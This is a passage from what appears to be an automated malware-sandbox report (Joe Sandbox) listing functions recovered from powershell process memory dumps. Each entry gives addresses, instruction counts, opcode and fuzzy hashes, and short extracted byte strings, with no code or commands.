Function 00A7F288 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1896264255.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a7d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c13d945b6000ef158d92985f8411db695d0251959250d32bcecb910bc5a6dee
Instruction ID: 587a35dd28947ffea16f74f26f104f6adb75d000f66e682b79dbb5ab892f55a3
Opcode Fuzzy Hash: 7c13d945b6000ef158d92985f8411db695d0251959250d32bcecb910bc5a6dee
Instruction Fuzzy Hash: DC21DC76504200EFCB05DF54DEC4B2ABFA5FB88314F24C5A9E9094E256C336D956CBA1

Function 00BCD472 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 824aea26c9395917c0c4302bad8fa24f64025ff8dbc22bab345dc1794b4b8ad5
Instruction ID: 578bb257a4706bb564b191e93602dba92af913ea2e61c015729a6aa726d0f9b4
Opcode Fuzzy Hash: 824aea26c9395917c0c4302bad8fa24f64025ff8dbc22bab345dc1794b4b8ad5
Instruction Fuzzy Hash: 99112331B042548FCB01DBA9E404A9DBBE6EF86310F1481AAE101CB756CB34ED4ACB91

Function 00BC9597 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1a7a2326dad6ff7a1b9c70fd1327487fb10cb09450a8b33aa2bfa169dbb13a1
Instruction ID: b26237d835850cb989061fb0aafb17ebefb0a1139c64ad4493f210df365ed160
Opcode Fuzzy Hash: f1a7a2326dad6ff7a1b9c70fd1327487fb10cb09450a8b33aa2bfa169dbb13a1
Instruction Fuzzy Hash: 22215C74A042498FCB01DF98D9809AEFBF1FF89310B2584A9D849EB352C731ED51CBA1

Function 00A7F283 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1896264255.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a7d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
Instruction ID: e53d22a700e4072ce67943d5653456849e127f312375494fa724e323074b183a
Opcode Fuzzy Hash: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
Instruction Fuzzy Hash: 8A21AC76504240DFCF06CF10C9C4B26BF72FB48314F24C5A9D9094E256C33AD86ACB91

Function 07270CA0 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 283c379674510a411d5b684d947fc6cfcf5f225b9bd8b171d19f64f3dd654013
Instruction ID: c314386573f685e4238370216573edca8b711e7b0ae9949ed982a0c70bde79d0
Opcode Fuzzy Hash: 283c379674510a411d5b684d947fc6cfcf5f225b9bd8b171d19f64f3dd654013
Instruction Fuzzy Hash: 5D0147763202168BD730556ED500277B79AEFC5222F14C43FD945CA350C672D84DC3A0

Function 07272B90 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d73e8997064261038e885da3c6db392e14c17254f1f4e1182b57e4341849b3f
Instruction ID: 9a321d0f39130896a4e14be344c18bbbf2d587168b474fb6481e496c0c1e6430
Opcode Fuzzy Hash: 6d73e8997064261038e885da3c6db392e14c17254f1f4e1182b57e4341849b3f
Instruction Fuzzy Hash: 2D012BB6724256CBC7249D6E9500776F7F9EBCA621B14943BD505C7340D572C48AC7A0

Function 00BCD590 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e371971769079a261c5f25c95b8ed9639fd2912e208cd04d84bfdf73647349f5
Instruction ID: df3d8b1e02619c58cd6d5603f7d0935cea294f3d9a13d7fd0bb35f744d1098f3
Opcode Fuzzy Hash: e371971769079a261c5f25c95b8ed9639fd2912e208cd04d84bfdf73647349f5
Instruction Fuzzy Hash: 6F0186353042409FC70B6738A15856E7BA7FFCA261329409EE906C7792CF288C02C7A2

Function 00A7D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1896264255.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a7d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc3b844394cfaf9be7f8aa1d219d2e879619e413a020e8cbce6c2bcd71066868
Instruction ID: 6a119d0c0b3871c2fc5eb4322c52bae0ae2a55e2de6fd2d40d8ca617c02b1c6a
Opcode Fuzzy Hash: dc3b844394cfaf9be7f8aa1d219d2e879619e413a020e8cbce6c2bcd71066868
Instruction Fuzzy Hash: 730126311083009AE7208B29CD84B67FFF8EF41364F1CC42AED0E0B286C279D842C6B1

Function 0727DA12 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef9acc0fd14305606c57aa9f5358cae146eef163a3bb9564c32fc48710116e07
Instruction ID: 3213184fe72568ec1de7d2ca714c4b643c1532673825b548f5860dcc37aa6da1
Opcode Fuzzy Hash: ef9acc0fd14305606c57aa9f5358cae146eef163a3bb9564c32fc48710116e07
Instruction Fuzzy Hash: 1001CCB424020ADFD7118B50CE42F9AB7B2AF85304F5088A8D5086B780CBB3DC84CF90

Function 00BCD551 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d56e3ac4b92cd8e8d99b113ba9944226c5b09214eabba21d68da19bfb00c9cf5
Instruction ID: 501404f56da82f18b0460f0c7e7d46ce521f59dbfb712dd71a3054f3674f09a3
Opcode Fuzzy Hash: d56e3ac4b92cd8e8d99b113ba9944226c5b09214eabba21d68da19bfb00c9cf5
Instruction Fuzzy Hash: 88F0F0397196A08FC71A9779A80054A7FA2DFCB310B1940EFD241CBB63C92998068762

Function 00BCF1D0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1c6863078a32753ab4a2eee95222830d0544eb6fc6a31bbcdce43dc8bfd394b
Instruction ID: e81d5b5c1056b8d21f00eb76f47d666f2ea3e3923e332f45a21211e1b2f76450
Opcode Fuzzy Hash: a1c6863078a32753ab4a2eee95222830d0544eb6fc6a31bbcdce43dc8bfd394b
Instruction Fuzzy Hash: CFF0F0363002019BCB142669E8487BEB7E7FBC9361B04853DE00ECB359DE319C468381

Function 00BCD5A0 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f8a28e653666a975e1a02fdd6e9c756532d1c97b351deb0a74022450de6231e
Instruction ID: 0937ef4cd05f3e2f9296e243c53059084f8a4ec3fa297903e88fe16504d9d04d
Opcode Fuzzy Hash: 9f8a28e653666a975e1a02fdd6e9c756532d1c97b351deb0a74022450de6231e
Instruction Fuzzy Hash: A6F090353006149B87176738A05853E7BA7FFC9661324405EE90BC3394DF38DC0387A5

Function 00A7D01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1896264255.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a7d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fa26e5aa79e7acbb612906a4f79e65b1be7f58bcabd29fff8fd589aa61e27ef
Instruction ID: 8df8a4c60f76059d623e5f7038f12850b51a42e6bf183c14b0cd3ec95ead5ccf
Opcode Fuzzy Hash: 4fa26e5aa79e7acbb612906a4f79e65b1be7f58bcabd29fff8fd589aa61e27ef
Instruction Fuzzy Hash: F1F0CD72108344AEEB208B1ACD84B62FFA8EF51734F18C45AED4D1E286C2799841CAB0

Function 00BCD620 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6dc8522ab61b53280a5a86f3e76d204d23f80d0d6555f8654832f05e5d45237
Instruction ID: ab4a00691417dbc46500da1d550f39320dbda9fd4bd18a2615341c1043a5d1ad
Opcode Fuzzy Hash: e6dc8522ab61b53280a5a86f3e76d204d23f80d0d6555f8654832f05e5d45237
Instruction Fuzzy Hash: 7E01C474A0120ADFCB44DFA9D441AAEBBF1EF48310F1046A9D90997315D7719981CF90

Function 00BCF1C0 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea229fe693cb84f71c9afad72127eeddc327f9ad4ff71b002a0d84c5fe173a44
Instruction ID: 1ce66d4398d07a06bcb7a756a9b53978efb98a9cf34467281bd502059f9019c2
Opcode Fuzzy Hash: ea229fe693cb84f71c9afad72127eeddc327f9ad4ff71b002a0d84c5fe173a44
Instruction Fuzzy Hash: 23F0A7363492815BC7131768AD586AABFA7EFC621532840FFD44ED7356CA214C068361

Function 00BCD617 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64a63e26b09aa7c581dfb689fda05aa0b1435e8601e9e6ef951743b3a57599c5
Instruction ID: 34f1f3e8e2a03bf37951a63dfba3bb11a3d4fc1fb7b1ca02348d74a5159481e3
Opcode Fuzzy Hash: 64a63e26b09aa7c581dfb689fda05aa0b1435e8601e9e6ef951743b3a57599c5
Instruction Fuzzy Hash: 0BF0B2B4A0020ADFCB44DFA9D945AAEBBF0AF08310F2046AED41AA7355D7759585CF80

Function 00BCFB6A Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 872f6d2e16a0a9d79d6dec8b8306e1ebcb2ed1c39dfab3b2629f02aaad0e57a8
Instruction ID: 78d1b9fd1bd99afa184c9d530af1df0d0875f1afcef6e4dee943e4d73f43b947
Opcode Fuzzy Hash: 872f6d2e16a0a9d79d6dec8b8306e1ebcb2ed1c39dfab3b2629f02aaad0e57a8
Instruction Fuzzy Hash: B0F0A739309790CBCB0A2778952C6DD6F67EFC6322B08409ED04A87343DF294946D366

Function 00BC7795 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bde85684417ad383f1b765cf77db00c4f56287950a99c7c030605386f56cf653
Instruction ID: bf294f8e0842572c5fb765b4a310df99ec4282781e21827d56eda2486484c04e
Opcode Fuzzy Hash: bde85684417ad383f1b765cf77db00c4f56287950a99c7c030605386f56cf653
Instruction Fuzzy Hash: 33F0377074020A9FDB04DBA4C655F5E7BB2EB40304F108564D102DF3A9CB799D499FC0

Function 00BCFA02 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 923e6f38e8cba0d216e79f80831da753078e92e9b6882efee7fb34dc420a3014
Instruction ID: bf7952b91faa997c91a7fb9e9396aac881a393a15faa3816ec8a8c584ecbe4ca
Opcode Fuzzy Hash: 923e6f38e8cba0d216e79f80831da753078e92e9b6882efee7fb34dc420a3014
Instruction Fuzzy Hash: C4E06D38A44248CFCB14AB74E446AAD7F72EF81206B0040ADE94AAB655E6319846DBC1

Function 00BCFB78 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de5cad73f32981fa644fcbe031c6ec8fa73de5430f55e52d0ceb210b3f126d4d
Instruction ID: 34475b313ef335fb5eea0331c74ed48449f273775b81128ce25371adea94339d
Opcode Fuzzy Hash: de5cad73f32981fa644fcbe031c6ec8fa73de5430f55e52d0ceb210b3f126d4d
Instruction Fuzzy Hash: 66E09A3530471087CA092679A01C6AE7A9AEBC5726F00002DE40A83242DF69194683AA

Function 00BCD4E8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c19b9fe470fba6d58031ea18f7c49e43fa24fe20e488a252753ecdbd3bd3f01d
Instruction ID: 9c606cedbacece844a18edfb4b9e15ee565f13f41cef03f621355d2016bb7f18
Opcode Fuzzy Hash: c19b9fe470fba6d58031ea18f7c49e43fa24fe20e488a252753ecdbd3bd3f01d
Instruction Fuzzy Hash: 76E0C2323106209FC200925DE40491A77DFEFCE711B2400AEE205C7321CEA1AC0143A0

Function 00BCF938 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0253de61f85eef45f1dfb8a9d1256927a9207391321f6cbc1d4375687b85462
Instruction ID: 591350efd69eafce99d82ccdd60aa4c9a501c4ca23727f1469b809ce38a57cb1
Opcode Fuzzy Hash: b0253de61f85eef45f1dfb8a9d1256927a9207391321f6cbc1d4375687b85462
Instruction Fuzzy Hash: B5E0D834A0838ACACF09EBA8E5594FC7F71FE41212B0000EEE407561A3DB205255CF81

Function 00BCFD10 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: 8a99e8b42a47ce344f1cc1dfc30363e90139baeaf58cb5f104dd4d7765db330b
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: BAD06270D042099F8780EFADC94166DFBF5EB48214F6085BE8919D7301E73156128BD1

Function 00BCF948 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9de879e6882e7886757dd56a6cca73a7696c38e0dd5f4db63d299e9519943db
Instruction ID: e557c992957f94e44037ae5227cd68ca044ad356883ac32da4ad00c1c7e193ff
Opcode Fuzzy Hash: e9de879e6882e7886757dd56a6cca73a7696c38e0dd5f4db63d299e9519943db
Instruction Fuzzy Hash: 59D0623090424ADBCF08AB64D55A4FD7B75FE10206F5001ADD91B521D2EE305556CAC1

Function 00BCFA10 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17e574829ef471490ea23fa28cc58235af4bea4159b66f35c55902bf7914c4aa
Instruction ID: f7fb4600155c845e073c69ec16129a785ec34a3f1e4f4533a0a3f24e98614c51
Opcode Fuzzy Hash: 17e574829ef471490ea23fa28cc58235af4bea4159b66f35c55902bf7914c4aa
Instruction Fuzzy Hash: FED06774A14209CF8B54EFA4E4569BEBBB6FB44215F1041ADEA0993391EB306C91CBC1

Function 07271A7E Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 294a8c16fce44f3fd419e41a5c619b26f92d9370b63d8ccd46458a49034bad37
Instruction ID: e6c2b596c8e1b322d85a989f91c1520343465813fdc664a7d488c71ef7c98269
Opcode Fuzzy Hash: 294a8c16fce44f3fd419e41a5c619b26f92d9370b63d8ccd46458a49034bad37
Instruction Fuzzy Hash: CEA011B820A0008BC200CA00C882800B320AB82208B28C088EA088F28ACBA3E8038A80

Non-executed Functions

Function 0727F612 Relevance: 18.0, Strings: 14, Instructions: 485COMMON

Download Yara Rule

Strings

XRcq, xrefs: 0727FB55
tP^q, xrefs: 0727FAC0
XRcq, xrefs: 0727FB45
$^q, xrefs: 0727F842
$^q, xrefs: 0727FA2D
tP^q, xrefs: 0727F782
tP^q, xrefs: 0727FAB4
4'^q, xrefs: 0727F8BA
$^q, xrefs: 0727F663
XRcq, xrefs: 0727FA11
tP^q, xrefs: 0727F78E
$^q, xrefs: 0727F684
$^q, xrefs: 0727F852
4'^q, xrefs: 0727F8C6

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$XRcq$XRcq$XRcq$tP^q$tP^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2758755434
Opcode ID: 5142c9cf4239d8ae8eb80ab299d01887a00d27464db458633a300ea6c7da1e72
Instruction ID: 91c01d3a20f0534ac07a54d26c112873ef1afef042b7e34b12d43c10e6cdf2b5
Opcode Fuzzy Hash: 5142c9cf4239d8ae8eb80ab299d01887a00d27464db458633a300ea6c7da1e72
Instruction Fuzzy Hash: 5302F771B2420BDFCB149F68CB44A6B7BE2AF89310F14C469E8119F295CB71DD86C7A1

Function 0727EF30 Relevance: 14.0, Strings: 11, Instructions: 299COMMON

Download Yara Rule

Strings

(dq, xrefs: 0727F1B0
tP^q, xrefs: 0727F081
4'^q, xrefs: 0727F260
(dq, xrefs: 0727F1A6
tP^q, xrefs: 0727F08D
4'^q, xrefs: 0727F254
tP^q, xrefs: 0727F17C
(dq, xrefs: 0727F142
(dq, xrefs: 0727F1E5
$^q, xrefs: 0727EFAD
tP^q, xrefs: 0727F188

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$$^q$(dq$(dq$(dq$(dq
API String ID: 0-459999756
Opcode ID: 2d572c2afd952a80a1e4a40796eed3919f12e962df8706cfc406b7ba8766cbd8
Instruction ID: e6dc4f79e65edcfc6d9bb23145bee6212d849187a4f4ab5d4de72583146d971b
Opcode Fuzzy Hash: 2d572c2afd952a80a1e4a40796eed3919f12e962df8706cfc406b7ba8766cbd8
Instruction Fuzzy Hash: 09B10B75B2411ADFCB24DF68CB04B6BBBE2AF89311F158469E8019B394CB71DC46C7A1

Function 0727EBE0 Relevance: 14.0, Strings: 11, Instructions: 240COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0727EE3E
TQcq, xrefs: 0727EC3A
TQcq, xrefs: 0727EDF2
4'^q, xrefs: 0727EE4A
$^q, xrefs: 0727EC5B
$^q, xrefs: 0727EC7C
$^q, xrefs: 0727EE0C
tP^q, xrefs: 0727ED4E
tP^q, xrefs: 0727ED5A
TQcq, xrefs: 0727EDE2
$^q, xrefs: 0727EE1C

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$TQcq$TQcq$TQcq$tP^q$tP^q$$^q$$^q$$^q$$^q
API String ID: 0-335829853
Opcode ID: d2c172eb6565d7b1d13b8a446ab89e8c925e238ad48d1c8a54987aab1602ba94
Instruction ID: 90a7567f22d7bfabc01b2b5bd40539ac46124969b3449fd328ae6e9494ee2ad1
Opcode Fuzzy Hash: d2c172eb6565d7b1d13b8a446ab89e8c925e238ad48d1c8a54987aab1602ba94
Instruction Fuzzy Hash: 278107B1F2020BDFCB248E19C64466B77A6AF85711F1A88E9E8019F394DB71DC85C7B1

Function 07276F68 Relevance: 11.6, Strings: 9, Instructions: 375COMMON

Download Yara Rule

Strings

4'^q, xrefs: 072771AE
4'^q, xrefs: 072771B8
$^q, xrefs: 07276FA0
tP^q, xrefs: 0727731C
tP^q, xrefs: 07276FE5
tP^q, xrefs: 07277328
$^q, xrefs: 07276F7A
tP^q, xrefs: 07276FF1
$^q, xrefs: 07276FAC

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$$^q$$^q$$^q
API String ID: 0-2740984363
Opcode ID: 34771be6f41a85c25e862e0250801cda48b6e51ad96a2aad7be546226a0f1c2b
Instruction ID: 670b983c363ee86f6bd68c9526cd7ac8154e5804b75cc2844e68c1f46f385630
Opcode Fuzzy Hash: 34771be6f41a85c25e862e0250801cda48b6e51ad96a2aad7be546226a0f1c2b
Instruction Fuzzy Hash: 38C16BB17243178FD7248A689E01BAABBE6EFC6710F14847AE515CF391DB32C845C7A1

Function 0727E6B8 Relevance: 11.5, Strings: 9, Instructions: 224COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0727E93B
tP^q, xrefs: 0727E89D
d%dq, xrefs: 0727E8FA
4'^q, xrefs: 0727E92F
d%dq, xrefs: 0727E8C5
$^q, xrefs: 0727E778
d%dq, xrefs: 0727E8BB
d%dq, xrefs: 0727E857
tP^q, xrefs: 0727E891

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$d%dq$d%dq$d%dq$d%dq$tP^q$tP^q$$^q
API String ID: 0-202320237
Opcode ID: 2432b208e179e2d982129fd84417a5a0179fd8bb383c60c48abe876b5c5cea5b
Instruction ID: b835dc3e69c18e14c96d3617daa6e0c8eaff259ea80724c2bf975b2d23270e84
Opcode Fuzzy Hash: 2432b208e179e2d982129fd84417a5a0179fd8bb383c60c48abe876b5c5cea5b
Instruction Fuzzy Hash: BB71F9B1F2021ADFDB249F29C604A6ABBE2AF88310F1584A9E8059F354DB71DD45C7A1

Function 0727AD80 Relevance: 10.3, Strings: 8, Instructions: 316COMMON

Download Yara Rule

Strings

$^q, xrefs: 0727AE1B
4'^q, xrefs: 0727B0E0
4'^q, xrefs: 0727B0EC
$^q, xrefs: 0727ADD7
$^q, xrefs: 0727ADF3
$^q, xrefs: 0727AE43
$^q, xrefs: 0727AE37
$^q, xrefs: 0727AE27

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3732357466
Opcode ID: 1f09c8616356973f681facce6e81317d0c3c7cb206c84353b2fff399202d2ff2
Instruction ID: 59c3c113c56ab66740822654501eb1261dbc67cb39afde532c085182755474dd
Opcode Fuzzy Hash: 1f09c8616356973f681facce6e81317d0c3c7cb206c84353b2fff399202d2ff2
Instruction Fuzzy Hash: 86A129F1B2420B8FCB249A6D8A44A6FBBF6AF85224F14C47AD505CF355DB32C845C791

Function 07277938 Relevance: 9.1, Strings: 7, Instructions: 384COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07277BEF
tP^q, xrefs: 07277D68
4'^q, xrefs: 072779EE
tP^q, xrefs: 07277D5C
4'^q, xrefs: 072779E2
$^q, xrefs: 07277CCC
4'^q, xrefs: 07277BE5

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q
API String ID: 0-1270759279
Opcode ID: ddc25c2305e81111533bc7e18f69a85ebc93b566f7b96bbdf06c47965b95985f
Instruction ID: bece9a97cb915ad3910ffc63a609fd4f136a3a5af05b678bd0c7c047bf05dca2
Opcode Fuzzy Hash: ddc25c2305e81111533bc7e18f69a85ebc93b566f7b96bbdf06c47965b95985f
Instruction Fuzzy Hash: 52C15BB1B2530BCFDB258B798A0176ABBA6AFC6310F1484BAD405CF351DB71C985C7A1

Function 07277F48 Relevance: 9.0, Strings: 7, Instructions: 237COMMON

Download Yara Rule

Strings

$^q, xrefs: 07277F80
$^q, xrefs: 07277F8C
4'^q, xrefs: 07278155
tP^q, xrefs: 07277FD1
tP^q, xrefs: 07277FC5
$^q, xrefs: 07277F5A
4'^q, xrefs: 07278149

Memory Dump Source

